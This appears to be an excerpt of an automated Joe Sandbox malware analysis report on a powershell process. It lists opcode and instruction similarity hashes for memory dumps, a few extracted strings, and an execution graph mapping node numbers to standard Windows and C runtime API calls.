                                                    • Opcode ID: bf4e16aadc303d1cff0969a9166ec0cf36e8b7af141b63182aeab3a6b5249e60
                                                    • Instruction ID: c51e33ea6f92e2c4646efc3923dede4e38c725959c6e1d0382af6219db2cf2e2
                                                    • Opcode Fuzzy Hash: bf4e16aadc303d1cff0969a9166ec0cf36e8b7af141b63182aeab3a6b5249e60
                                                    • Instruction Fuzzy Hash: F81199F235031A67EF701E668895F37B7EA4B81710F24C629AA04CB2C1CA79D540E260
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9d1c77eb43f2d89358470991b17feeab1288d6be53a36e1ee4ff13d333f0a09
                                                    • Instruction ID: 0b6e629b014ed9c66ee17196e7642c44b89340ae7601be58648d334c7af298ef
                                                    • Opcode Fuzzy Hash: f9d1c77eb43f2d89358470991b17feeab1288d6be53a36e1ee4ff13d333f0a09
                                                    • Instruction Fuzzy Hash: 3111E9B0609385AFD7119B248C69F56BF659B86614F08C18AF5058F2D3CE76DC42C7A2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9157cd9461385cb46f32d6e1ec757bdca93c350ae0afbf591fddaee4491c5d1
                                                    • Instruction ID: 7340c3e4421dc16380061ceef1247d8cb92ca2461d0a89d01246b95524eed97a
                                                    • Opcode Fuzzy Hash: f9157cd9461385cb46f32d6e1ec757bdca93c350ae0afbf591fddaee4491c5d1
                                                    • Instruction Fuzzy Hash: C901477631031A8BCBA4576AD424A7FB7D9DBC1632F14C43EE859C6200D672C845C360
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771545714.00000000041B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 041B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_41b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 85fc00e79272b0bbb7d22c918e1d4c5fa6a36734b87974ace743864013eda516
                                                    • Instruction ID: b8684ff8cc2024edd5e3970f68bb08240eba1ce76a431dece0eede7400d8060f
                                                    • Opcode Fuzzy Hash: 85fc00e79272b0bbb7d22c918e1d4c5fa6a36734b87974ace743864013eda516
                                                    • Instruction Fuzzy Hash: B911C830D04148EBEF34EA94DDD87ECB772AB4531DF1458A9C081F6290EB75688ACB95
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771150728.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_87d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c3c960dbb1a292a51cf552319ffcc6aed549b26c225887accfe03cda855417c3
                                                    • Instruction ID: 94e4897b90276437abd0357c5540b1677ee2f08db818255bcfd28dd9598c47ff
                                                    • Opcode Fuzzy Hash: c3c960dbb1a292a51cf552319ffcc6aed549b26c225887accfe03cda855417c3
                                                    • Instruction Fuzzy Hash: BA0184714057489AE7108A25C8C4B67BFE8EF51729F18C51ADD4C8A146C779D841C7B2
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771150728.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_87d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8635d7dec112cdc7d26d2ffc3834b5dab39dde5156189bcaf04bca763e4774cd
                                                    • Instruction ID: fe6addaad8a8b18f34671f5faaa4966af5eb65157e8d11e8c04a9558e6dff750
                                                    • Opcode Fuzzy Hash: 8635d7dec112cdc7d26d2ffc3834b5dab39dde5156189bcaf04bca763e4774cd
                                                    • Instruction Fuzzy Hash: DCF06271405744AEE7108A15C9C4B63FFE8EF51734F18C55AED4C4E286C3799844CBB1
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1771150728.000000000087D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0087D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_87d000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6f2d572c0b1dd2f2e61e9de4a55627c90e1994d7ac2ac424c6bd991683b3a749
                                                    • Instruction ID: 3652f5c6becf341d7337c2e8d25c18677c3886ddc60b5512a15796ea2694744a
                                                    • Opcode Fuzzy Hash: 6f2d572c0b1dd2f2e61e9de4a55627c90e1994d7ac2ac424c6bd991683b3a749
                                                    • Instruction Fuzzy Hash: B221F0B26083049FDB04DF14D984B2AFBA5FB94728F20C669D40E8B649C37AD846C662
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl$(ftl
                                                    • API String ID: 0-967766105
                                                    • Opcode ID: d390ba66083f20ede97beac3fe86c13e26ce6563e3ec0f8260c3caba4f7c2266
                                                    • Instruction ID: 38edd99b656a4c60c45f7325fe2dd1eecd158883c52b2268ab071e73fa32d354
                                                    • Opcode Fuzzy Hash: d390ba66083f20ede97beac3fe86c13e26ce6563e3ec0f8260c3caba4f7c2266
                                                    • Instruction Fuzzy Hash: BBC1B1F0A00615CFDB60DF54C565A6EB7E2BF89700F14C629C816AB784DB72EC42CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$(ftl$(ftl$4ql$4ql$tLfk
                                                    • API String ID: 0-3226375408
                                                    • Opcode ID: 2417439e0409faf9c613d40719e728def236a3d2ce712913285a9397c1ece4ad
                                                    • Instruction ID: 7345858cf3b07c1625b5e8e6c47ca3ecfa64641debcb887ab304c08b9729bfae
                                                    • Opcode Fuzzy Hash: 2417439e0409faf9c613d40719e728def236a3d2ce712913285a9397c1ece4ad
                                                    • Instruction Fuzzy Hash: 7361A1B4B00305DBD764DF58C564A6ABBE3BF89710F18C669D8069B341DB32EC42CB52
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$x.ek$-ek
                                                    • API String ID: 0-3395547393
                                                    • Opcode ID: 6097c696fa7241dc95f6cee97b62033a57f38dc96bfd1c377ab1b8dff987d05a
                                                    • Instruction ID: 8a4e32116c6d0d1f59c664595ac8fad4a8d4ad2f310f3184a4b18dc99455010a
                                                    • Opcode Fuzzy Hash: 6097c696fa7241dc95f6cee97b62033a57f38dc96bfd1c377ab1b8dff987d05a
                                                    • Instruction Fuzzy Hash: D8C18CB8A00309DFDB64DF54C964BAEBBF2BF85704F14C629D8156B394DB31AC418B91
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$(ftl$(ftl
                                                    • API String ID: 0-2794839566
                                                    • Opcode ID: d16fa031a9f588a3a9178cefe60f3ab723e33f307dde4e9e4862c145b0895b1d
                                                    • Instruction ID: a611e70263e482a8fe814f1782fcd1c435a67b9bf010a4c0a1cb967e3fb45c80
                                                    • Opcode Fuzzy Hash: d16fa031a9f588a3a9178cefe60f3ab723e33f307dde4e9e4862c145b0895b1d
                                                    • Instruction Fuzzy Hash: 04A18CF0A00712DFDB60CF54C965A6EBBF2BF89314F14C62AD9166B784C772A842CB51
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$(ftl$(ftl
                                                    • API String ID: 0-2794839566
                                                    • Opcode ID: 32ed1c80ded32d62991a27cd1633c5d0adca5785dc84f6726e6e76dfd319333f
                                                    • Instruction ID: 7b42b3a9337690e0e2d52ddfbabd91b00e7c19832718ca640832c5f8c7eac64d
                                                    • Opcode Fuzzy Hash: 32ed1c80ded32d62991a27cd1633c5d0adca5785dc84f6726e6e76dfd319333f
                                                    • Instruction Fuzzy Hash: D8718EB4A00205CFDB54DF68C565EAEBBF2AF89318F14D269D805AB355CB32DC41CB92
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.1802417616.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7060000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (ftl$(ftl$4ql$tLfk
                                                    • API String ID: 0-3866447541
                                                    • Opcode ID: bb3d6301489afdc2926aa5d5083bb79dd08a9e37cdb482f70aad3358c82918b5
                                                    • Instruction ID: e957e04097884f816155bbf0e7a520d5bf0cc06c4e18144cba80147b6bd6e8fb
                                                    • Opcode Fuzzy Hash: bb3d6301489afdc2926aa5d5083bb79dd08a9e37cdb482f70aad3358c82918b5
                                                    • Instruction Fuzzy Hash: F9518FB8A00302DFDB64CF54C568AAABBF2BF85714F18C669D8066B351D732E842CF51

                                                    Execution Graph

                                                    Execution Coverage:2%
                                                    Dynamic/Decrypted Code Coverage:0%
                                                    Signature Coverage:2.7%
                                                    Total number of Nodes:1649
                                                    Total number of Limit Nodes:1
                                                    execution_graph 6956 232d60ac 6957 232d60dd 6956->6957 6958 232d60b7 6956->6958 6958->6957 6959 232d60c7 FreeLibrary 6958->6959 6959->6958 6376 232d506f 6377 232d5087 6376->6377 6378 232d5081 6376->6378 6379 232d5000 20 API calls 6378->6379 6379->6377 5948 232d742b 5949 232d7430 5948->5949 5951 232d7453 5949->5951 5952 232d8bae 5949->5952 5953 232d8bbb 5952->5953 5954 232d8bdd 5952->5954 5955 232d8bc9 RtlDeleteCriticalSection 5953->5955 5956 232d8bd7 5953->5956 5954->5949 5955->5955 5955->5956 5957 232d571e _free 20 API calls 5956->5957 5957->5954 6380 232dac6b 6381 232dac84 __startOneArgErrorHandling 6380->6381 6382 232dacad __startOneArgErrorHandling 6381->6382 6384 232db2f0 6381->6384 6385 232db329 __startOneArgErrorHandling 6384->6385 6387 232db350 __startOneArgErrorHandling 6385->6387 6395 232db5c1 6385->6395 6388 232db393 6387->6388 6389 232db36e 6387->6389 6408 232db8b2 6388->6408 6399 232db8e1 6389->6399 6392 232db38e __startOneArgErrorHandling 6393 232d2ada _ValidateLocalCookies 5 API calls 6392->6393 6394 232db3b7 6393->6394 6394->6382 6396 232db5ec __raise_exc 6395->6396 6397 232db7e5 RaiseException 6396->6397 6398 232db7fd 6397->6398 6398->6387 6400 232db8f0 6399->6400 6401 232db90f __startOneArgErrorHandling 6400->6401 6402 232db964 __startOneArgErrorHandling 6400->6402 6415 232d78a3 6401->6415 6404 232db8b2 __startOneArgErrorHandling 20 API calls 6402->6404 6407 232db95d 6404->6407 6406 232db8b2 __startOneArgErrorHandling 20 API calls 6406->6407 6407->6392 6409 232db8bf 6408->6409 6410 232db8d4 6408->6410 6411 232db8d9 6409->6411 6413 232d6368 _free 20 API calls 6409->6413 6412 232d6368 _free 20 API calls 6410->6412 6411->6392 6412->6411 6414 232db8cc 6413->6414 6414->6392 6416 232d78cb 6415->6416 6417 232d2ada _ValidateLocalCookies 5 API calls 6416->6417 6418 232d78e8 6417->6418 6418->6406 6418->6407 6960 232dc7a7 6961 232dc7be 6960->6961 6965 232dc80d 6960->6965 6961->6965 6969 232dc7e6 GetModuleHandleA 6961->6969 6962 232dc835 GetModuleHandleA 6962->6965 6963 232dc872 6965->6962 6965->6963 6967 232dc85f GetProcAddress 6965->6967 6967->6965 6970 232dc7ef 6969->6970 6975 232dc80d 6969->6975 6978 232dc803 GetProcAddress 6970->6978 6972 232dc835 GetModuleHandleA 6972->6975 6973 232dc872 6975->6972 6975->6973 6977 232dc85f GetProcAddress 6975->6977 6977->6975 6982 232dc80d 6978->6982 6979 232dc835 GetModuleHandleA 6979->6982 6980 232dc872 6981 232dc85f GetProcAddress 6981->6982 6982->6979 6982->6980 6982->6981 6983 232d21a1 ___scrt_dllmain_exception_filter 6984 232d81a0 6985 232d81d9 6984->6985 6986 232d81dd 6985->6986 6997 232d8205 6985->6997 6987 232d6368 _free 20 API calls 6986->6987 6989 232d81e2 6987->6989 6988 232d8529 6990 232d2ada _ValidateLocalCookies 5 API calls 6988->6990 6991 232d62ac ___std_exception_copy 26 API calls 6989->6991 6992 232d8536 6990->6992 6993 232d81ed 6991->6993 6994 232d2ada _ValidateLocalCookies 5 API calls 6993->6994 6995 232d81f9 6994->6995 6997->6988 6998 232d80c0 6997->6998 7001 232d80db 6998->7001 6999 232d2ada _ValidateLocalCookies 5 API calls 7000 232d8152 6999->7000 7000->6997 7001->6999 7252 232da1e0 7255 232da1fe 7252->7255 7254 232da1f6 7259 232da203 7255->7259 7256 232daa53 21 API calls 7258 232da42f 7256->7258 7257 232da298 7257->7254 7258->7254 7259->7256 7259->7257 5958 232d543d 5959 232d5440 5958->5959 5962 232d55a8 5959->5962 5973 232d7613 5962->5973 5966 232d55e0 6009 232d4bc1 5966->6009 5967 232d55c2 IsProcessorFeaturePresent 5970 232d55cd 5967->5970 5969 232d55b8 5969->5966 5969->5967 6003 232d60e2 5970->6003 6012 232d7581 5973->6012 5976 232d766e 5977 232d767a _abort 5976->5977 5978 232d5b7a _free 20 API calls 5977->5978 5980 232d76a1 _abort 5977->5980 5983 232d76a7 _abort 5977->5983 5978->5980 5979 232d76f3 5981 232d6368 _free 20 API calls 5979->5981 5980->5979 5980->5983 6002 232d76d6 5980->6002 5982 232d76f8 5981->5982 6026 232d62ac 5982->6026 5988 232d771f 5983->5988 6029 232d5671 RtlEnterCriticalSection 5983->6029 5990 232d777e 5988->5990 5992 232d7776 5988->5992 5999 232d77a9 5988->5999 6030 232d56b9 RtlLeaveCriticalSection 5988->6030 5990->5999 6031 232d7665 5990->6031 5993 232d4bc1 _abort 28 API calls 5992->5993 5993->5990 5998 232d7665 _abort 38 API calls 5998->5999 6034 232d782e 5999->6034 6000 232d780c 6001 232d5af6 _abort 38 API calls 6000->6001 6000->6002 6001->6002 6058 232dbdc9 6002->6058 6004 232d60fe ___scrt_fastfail 6003->6004 6005 232d612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6004->6005 6006 232d61fb ___scrt_fastfail 6005->6006 6007 232d2ada _ValidateLocalCookies 5 API calls 6006->6007 6008 232d6219 6007->6008 6008->5966 6077 232d499b 6009->6077 6015 232d7527 6012->6015 6014 232d55ad 6014->5969 6014->5976 6016 232d7533 ___DestructExceptionObject 6015->6016 6021 232d5671 RtlEnterCriticalSection 6016->6021 6018 232d7541 6022 232d7575 6018->6022 6020 232d7568 _abort 6020->6014 6021->6018 6025 232d56b9 RtlLeaveCriticalSection 6022->6025 6024 232d757f 6024->6020 6025->6024 6061 232d6231 6026->6061 6028 232d62b8 6028->6002 6029->5988 6030->5992 6032 232d5af6 _abort 38 API calls 6031->6032 6033 232d766a 6032->6033 6033->5998 6035 232d77fd 6034->6035 6036 232d7834 6034->6036 6035->6000 6035->6002 6038 232d5af6 GetLastError 6035->6038 6076 232d56b9 RtlLeaveCriticalSection 6036->6076 6039 232d5b0c 6038->6039 6040 232d5b12 6038->6040 6041 232d5e08 _free 11 API calls 6039->6041 6042 232d637b _free 20 API calls 6040->6042 6044 232d5b61 SetLastError 6040->6044 6041->6040 6043 232d5b24 6042->6043 6045 232d5e5e _free 11 API calls 6043->6045 6050 232d5b2c 6043->6050 6044->6000 6047 232d5b41 6045->6047 6046 232d571e _free 20 API calls 6048 232d5b32 6046->6048 6049 232d5b48 6047->6049 6047->6050 6051 232d5b6d SetLastError 6048->6051 6052 232d593c _free 20 API calls 6049->6052 6050->6046 6054 232d55a8 _abort 35 API calls 6051->6054 6053 232d5b53 6052->6053 6056 232d571e _free 20 API calls 6053->6056 6055 232d5b79 6054->6055 6057 232d5b5a 6056->6057 6057->6044 6057->6051 6059 232d2ada _ValidateLocalCookies 5 API calls 6058->6059 6060 232dbdd4 6059->6060 6060->6060 6062 232d5b7a _free 20 API calls 6061->6062 6063 232d6247 6062->6063 6064 232d6255 6063->6064 6065 232d62a6 6063->6065 6070 232d2ada _ValidateLocalCookies 5 API calls 6064->6070 6072 232d62bc IsProcessorFeaturePresent 6065->6072 6067 232d62ab 6068 232d6231 ___std_exception_copy 26 API calls 6067->6068 6069 232d62b8 6068->6069 6069->6028 6071 232d627c 6070->6071 6071->6028 6073 232d62c7 6072->6073 6074 232d60e2 _abort 8 API calls 6073->6074 6075 232d62dc GetCurrentProcess TerminateProcess 6074->6075 6075->6067 6076->6035 6078 232d49a7 _abort 6077->6078 6079 232d49bf 6078->6079 6099 232d4af5 GetModuleHandleW 6078->6099 6108 232d5671 RtlEnterCriticalSection 6079->6108 6083 232d4a65 6116 232d4aa5 6083->6116 6086 232d49c7 6086->6083 6088 232d4a3c 6086->6088 6109 232d527a 6086->6109 6091 232d4a54 6088->6091 6112 232d4669 6088->6112 6089 232d4aae 6095 232dbdc9 _abort 5 API calls 6089->6095 6090 232d4a82 6119 232d4ab4 6090->6119 6092 232d4669 _abort 5 API calls 6091->6092 6092->6083 6098 232d4ab3 6095->6098 6100 232d49b3 6099->6100 6100->6079 6101 232d4b39 GetModuleHandleExW 6100->6101 6102 232d4b63 GetProcAddress 6101->6102 6106 232d4b78 6101->6106 6102->6106 6103 232d4b8c FreeLibrary 6104 232d4b95 6103->6104 6105 232d2ada _ValidateLocalCookies 5 API calls 6104->6105 6107 232d4b9f 6105->6107 6106->6103 6106->6104 6107->6079 6108->6086 6127 232d5132 6109->6127 6114 232d4698 6112->6114 6113 232d2ada _ValidateLocalCookies 5 API calls 6115 232d46c1 6113->6115 6114->6113 6115->6091 6149 232d56b9 RtlLeaveCriticalSection 6116->6149 6118 232d4a7e 6118->6089 6118->6090 6150 232d6025 6119->6150 6122 232d4ae2 6124 232d4b39 _abort 8 API calls 6122->6124 6123 232d4ac2 GetPEB 6123->6122 6125 232d4ad2 GetCurrentProcess TerminateProcess 6123->6125 6126 232d4aea ExitProcess 6124->6126 6125->6122 6130 232d50e1 6127->6130 6129 232d5156 6129->6088 6131 232d50ed ___DestructExceptionObject 6130->6131 6138 232d5671 RtlEnterCriticalSection 6131->6138 6133 232d50fb 6139 232d515a 6133->6139 6137 232d5119 _abort 6137->6129 6138->6133 6140 232d517a 6139->6140 6143 232d5182 6139->6143 6141 232d2ada _ValidateLocalCookies 5 API calls 6140->6141 6142 232d5108 6141->6142 6145 232d5126 6142->6145 6143->6140 6144 232d571e _free 20 API calls 6143->6144 6144->6140 6148 232d56b9 RtlLeaveCriticalSection 6145->6148 6147 232d5130 6147->6137 6148->6147 6149->6118 6151 232d604a 6150->6151 6152 232d6040 6150->6152 6153 232d5c45 _free 5 API calls 6151->6153 6154 232d2ada _ValidateLocalCookies 5 API calls 6152->6154 6153->6152 6155 232d4abe 6154->6155 6155->6122 6155->6123 6156 232d1f3f 6157 232d1f4b ___DestructExceptionObject 6156->6157 6174 232d247c 6157->6174 6159 232d1f52 6160 232d1f7c 6159->6160 6161 232d2041 6159->6161 6168 232d1f57 ___scrt_is_nonwritable_in_current_image 6159->6168 6185 232d23de 6160->6185 6197 232d2639 IsProcessorFeaturePresent 6161->6197 6164 232d2048 6165 232d1f8b __RTC_Initialize 6165->6168 6188 232d22fc RtlInitializeSListHead 6165->6188 6167 232d1f99 ___scrt_initialize_default_local_stdio_options 6189 232d46c5 6167->6189 6172 232d1fb8 6172->6168 6173 232d4669 _abort 5 API calls 6172->6173 6173->6168 6175 232d2485 6174->6175 6201 232d2933 IsProcessorFeaturePresent 6175->6201 6179 232d2496 6184 232d249a 6179->6184 6212 232d53c8 6179->6212 6182 232d24b1 6182->6159 6184->6159 6286 232d24b5 6185->6286 6187 232d23e5 6187->6165 6188->6167 6192 232d46dc 6189->6192 6190 232d2ada _ValidateLocalCookies 5 API calls 6191 232d1fad 6190->6191 6191->6168 6193 232d23b3 6191->6193 6192->6190 6194 232d23b8 ___scrt_release_startup_lock 6193->6194 6195 232d2933 ___isa_available_init IsProcessorFeaturePresent 6194->6195 6196 232d23c1 6194->6196 6195->6196 6196->6172 6198 232d264e ___scrt_fastfail 6197->6198 6199 232d26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6198->6199 6200 232d2744 ___scrt_fastfail 6199->6200 6200->6164 6202 232d2491 6201->6202 6203 232d34ea 6202->6203 6204 232d34ef ___vcrt_initialize_winapi_thunks 6203->6204 6223 232d3936 6204->6223 6207 232d34fd 6207->6179 6209 232d3505 6210 232d3510 6209->6210 6237 232d3972 6209->6237 6210->6179 6278 232d7457 6212->6278 6215 232d3529 6216 232d3532 6215->6216 6222 232d3543 6215->6222 6217 232d391b ___vcrt_uninitialize_ptd 6 API calls 6216->6217 6218 232d3537 6217->6218 6219 232d3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6218->6219 6220 232d353c 6219->6220 6282 232d3c50 6220->6282 6222->6184 6224 232d393f 6223->6224 6226 232d3968 6224->6226 6228 232d34f9 6224->6228 6241 232d3be0 6224->6241 6227 232d3972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6226->6227 6227->6228 6228->6207 6229 232d38e8 6228->6229 6259 232d3af1 6229->6259 6233 232d3918 6233->6209 6236 232d38fd 6236->6209 6238 232d399c 6237->6238 6239 232d397d 6237->6239 6238->6207 6240 232d3987 RtlDeleteCriticalSection 6239->6240 6240->6238 6240->6240 6246 232d3a82 6241->6246 6243 232d3bfa 6244 232d3c18 InitializeCriticalSectionAndSpinCount 6243->6244 6245 232d3c03 6243->6245 6244->6245 6245->6224 6247 232d3aaa 6246->6247 6251 232d3aa6 __crt_fast_encode_pointer 6246->6251 6247->6251 6252 232d39be 6247->6252 6250 232d3ac4 GetProcAddress 6250->6251 6251->6243 6255 232d39cd try_get_first_available_module 6252->6255 6253 232d39ea LoadLibraryExW 6254 232d3a05 GetLastError 6253->6254 6253->6255 6254->6255 6255->6253 6256 232d3a60 FreeLibrary 6255->6256 6257 232d3a77 6255->6257 6258 232d3a38 LoadLibraryExW 6255->6258 6256->6255 6257->6250 6257->6251 6258->6255 6260 232d3a82 try_get_function 5 API calls 6259->6260 6261 232d3b0b 6260->6261 6262 232d3b24 TlsAlloc 6261->6262 6263 232d38f2 6261->6263 6263->6236 6264 232d3ba2 6263->6264 6265 232d3a82 try_get_function 5 API calls 6264->6265 6266 232d3bbc 6265->6266 6267 232d3bd7 TlsSetValue 6266->6267 6268 232d390b 6266->6268 6267->6268 6268->6233 6269 232d391b 6268->6269 6270 232d3925 6269->6270 6271 232d392b 6269->6271 6273 232d3b2c 6270->6273 6271->6236 6274 232d3a82 try_get_function 5 API calls 6273->6274 6275 232d3b46 6274->6275 6276 232d3b5e TlsFree 6275->6276 6277 232d3b52 6275->6277 6276->6277 6277->6271 6279 232d7470 6278->6279 6280 232d2ada _ValidateLocalCookies 5 API calls 6279->6280 6281 232d24a3 6280->6281 6281->6182 6281->6215 6283 232d3c7f 6282->6283 6284 232d3c59 6282->6284 6283->6222 6284->6283 6285 232d3c69 FreeLibrary 6284->6285 6285->6284 6287 232d24c8 6286->6287 6288 232d24c4 6286->6288 6289 232d2639 ___scrt_fastfail 4 API calls 6287->6289 6291 232d24d5 ___scrt_release_startup_lock 6287->6291 6288->6187 6290 232d2559 6289->6290 6291->6187 7002 232d67bf 7007 232d67f4 7002->7007 7005 232d571e _free 20 API calls 7006 232d67db 7005->7006 7008 232d6806 7007->7008 7009 232d67cd 7007->7009 7010 232d680b 7008->7010 7011 232d6836 7008->7011 7009->7005 7009->7006 7012 232d637b _free 20 API calls 7010->7012 7011->7009 7018 232d71d6 7011->7018 7014 232d6814 7012->7014 7015 232d571e _free 20 API calls 7014->7015 7015->7009 7016 232d6851 7017 232d571e _free 20 API calls 7016->7017 7017->7009 7019 232d71e1 7018->7019 7020 232d7209 7019->7020 7021 232d71fa 7019->7021 7023 232d7218 7020->7023 7027 232d8a98 7020->7027 7024 232d6368 _free 20 API calls 7021->7024 7034 232d8acb 7023->7034 7026 232d71ff ___scrt_fastfail 7024->7026 7026->7016 7028 232d8ab8 RtlSizeHeap 7027->7028 7029 232d8aa3 7027->7029 7028->7023 7030 232d6368 _free 20 API calls 7029->7030 7031 232d8aa8 7030->7031 7032 232d62ac ___std_exception_copy 26 API calls 7031->7032 7033 232d8ab3 7032->7033 7033->7023 7035 232d8ad8 7034->7035 7036 232d8ae3 7034->7036 7046 232d56d0 7035->7046 7038 232d8aeb 7036->7038 7045 232d8af4 _free 7036->7045 7041 232d571e _free 20 API calls 7038->7041 7039 232d8b1e RtlReAllocateHeap 7043 232d8ae0 7039->7043 7039->7045 7040 232d8af9 7042 232d6368 _free 20 API calls 7040->7042 7041->7043 7042->7043 7043->7026 7044 232d474f _free 7 API calls 7044->7045 7045->7039 7045->7040 7045->7044 7047 232d570e 7046->7047 7051 232d56de _free 7046->7051 7048 232d6368 _free 20 API calls 7047->7048 7050 232d570c 7048->7050 7049 232d56f9 RtlAllocateHeap 7049->7050 7049->7051 7050->7043 7051->7047 7051->7049 7052 232d474f _free 7 API calls 7051->7052 7052->7051 7260 232d5bff 7268 232d5d5c 7260->7268 7263 232d5c13 7264 232d5b7a _free 20 API calls 7265 232d5c1b 7264->7265 7266 232d5c28 7265->7266 7267 232d5c2b 11 API calls 7265->7267 7267->7263 7269 232d5c45 _free 5 API calls 7268->7269 7270 232d5d83 7269->7270 7271 232d5d9b TlsAlloc 7270->7271 7272 232d5d8c 7270->7272 7271->7272 7273 232d2ada _ValidateLocalCookies 5 API calls 7272->7273 7274 232d5c09 7273->7274 7274->7263 7274->7264 7053 232d9db8 7054 232d9dbf 7053->7054 7055 232d9ddf 7054->7055 7057 232d9e20 7054->7057 7056 232da90e 7055->7056 7060 232daa17 21 API calls 7055->7060 7057->7056 7058 232daa17 21 API calls 7057->7058 7059 232d9e6e 7058->7059 7061 232da93e 7060->7061 6419 232d9e71 6420 232d9e95 6419->6420 6421 232d9eae 6420->6421 6425 232dac6b __startOneArgErrorHandling 6420->6425 6424 232d9ef8 6421->6424 6427 232daa53 6421->6427 6422 232dacad __startOneArgErrorHandling 6425->6422 6426 232db2f0 21 API calls 6425->6426 6426->6422 6428 232daa70 RtlDecodePointer 6427->6428 6429 232daa80 6427->6429 6428->6429 6430 232dab0d 6429->6430 6433 232dab02 6429->6433 6435 232daab7 6429->6435 6430->6433 6434 232d6368 _free 20 API calls 6430->6434 6431 232d2ada _ValidateLocalCookies 5 API calls 6432 232dac67 6431->6432 6432->6424 6433->6431 6434->6433 6435->6433 6436 232d6368 _free 20 API calls 6435->6436 6436->6433 6292 232d5630 6293 232d563b 6292->6293 6295 232d5664 6293->6295 6296 232d5660 6293->6296 6298 232d5eb7 6293->6298 6305 232d5688 6295->6305 6299 232d5c45 _free 5 API calls 6298->6299 6300 232d5ede 6299->6300 6301 232d5efc InitializeCriticalSectionAndSpinCount 6300->6301 6302 232d5ee7 6300->6302 6301->6302 6303 232d2ada _ValidateLocalCookies 5 API calls 6302->6303 6304 232d5f13 6303->6304 6304->6293 6306 232d56b4 6305->6306 6307 232d5695 6305->6307 6306->6296 6308 232d569f RtlDeleteCriticalSection 6307->6308 6308->6306 6308->6308 6437 232d3370 6448 232d3330 6437->6448 6449 232d334f 6448->6449 6450 232d3342 6448->6450 6451 232d2ada _ValidateLocalCookies 5 API calls 6450->6451 6451->6449 7275 232d63f0 7276 232d6400 7275->7276 7283 232d6416 7275->7283 7277 232d6368 _free 20 API calls 7276->7277 7278 232d6405 7277->7278 7279 232d62ac ___std_exception_copy 26 API calls 7278->7279 7282 232d640f 7279->7282 7280 232d6480 7305 232d4e76 7280->7305 7283->7280 7288 232d6561 7283->7288 7294 232d6580 7283->7294 7285 232d64ee 7286 232d571e _free 20 API calls 7285->7286 7286->7288 7287 232d64e5 7287->7285 7291 232d6573 7287->7291 7311 232d85eb 